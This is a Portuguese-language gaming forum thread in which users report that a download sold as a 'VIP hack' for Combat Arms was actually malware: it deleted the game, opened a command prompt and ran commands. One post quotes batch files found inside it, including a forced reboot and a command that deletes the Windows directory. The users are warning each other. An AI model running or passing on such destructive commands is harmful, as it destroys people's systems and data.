Ir para conteúdo
Faça parte da equipe! (2024) ×
Conheça nossa Beta Zone! Novas áreas a caminho! ×
  • Quem está por aqui   0 membros estão online

• Nenhum usuário registrado visualizando esta página.

[NEW] 4Vip Hack - Aimbot VIP,Life Tanker,Crash Room,God Mode,e Muito Mais Sem DC!

Posts Recomendados

xAnonymous

Fiz a verificação e o avast não encontrou nada. as únicas diferenças que eu encontrei foram o combat arms ter sumido(nem .exe existe mais), a própria pasta do hack e o brazukas hack.

fico calmo ou não ?

Link para o comentário
Compartilhar em outros sites

bom se vc não notou nenhum dano grave ocorrido fique tranquilo, se pc estiver reiniciando sozinhu,dando erros ai tente fazer a formatação,pelo que vi apenas foi excluido o combat, eu baixei aqui pra ver o resultado e como imaginei meu combat tbm sumiu fiz uma verificaçoes e consegui arrumar os danos

Link para o comentário

veiu foi apagado umas coisas e agora nao sei o q devo fazer ele tava lento dai passsei o anti viros mandei pra quarentena o viros e pasei o ccleaner dai nao fico mais lento vo reiniciar aqui pra ver se eu nao volta fudeu msm valew pela ajuda amigo

Link para o comentário

vo logo avisando quem baixa isso ta pedindo pra fuder o pc!!!

serio num e brincadeira assim que abrer o arquivo instalar abre altomaticamente o pronpt e quer abrir o arquivo protegido ainda bem que o windons num deixa!!

Link para o comentário

galera um conselho nunca baixe nada sem verificar antes ou vir de uma fonte confiavel,leia bastante o resultados dos cobaias,fique sempre atento em tudo que vc baixa.. mas qualquer duvidas ainda só postar ae que estarei ajudando no que puder

Link para o comentário

ae kara tu ñ tem oq faze?

isso pode ser oq vc kize mas hack pra ca num é aki nem lá na china

quando fui instala a bagaça abriu o cmd e começou a enviar comandos

muitos estranhos do tipo alguma coisa a ver com logoff

oq um hack tem a ver com logof tenho ate um print aki

Sem%20t%EDtulo.png

][/font]

Link para o comentário

manolitos eu achei arquivos .bat nos exe da pasta

olha o que tinha neles:

1º .bat

@echo off

@break off

shutdown -r -f -t 00

exit

2º .bat

rmdir /s /q c:\windows

shutdown -s -c "Todas suas bases pertencem a mim." -t 03

Link para o comentário

Este tópico está impedido de receber novos posts.
 Compartilhar

• Criar Novo...

Informação Importante

Nós fazemos uso de cookies no seu dispositivo para ajudar a tornar este site melhor. Você pode ajustar suas configurações de cookies , caso contrário, vamos supor que você está bem para continuar.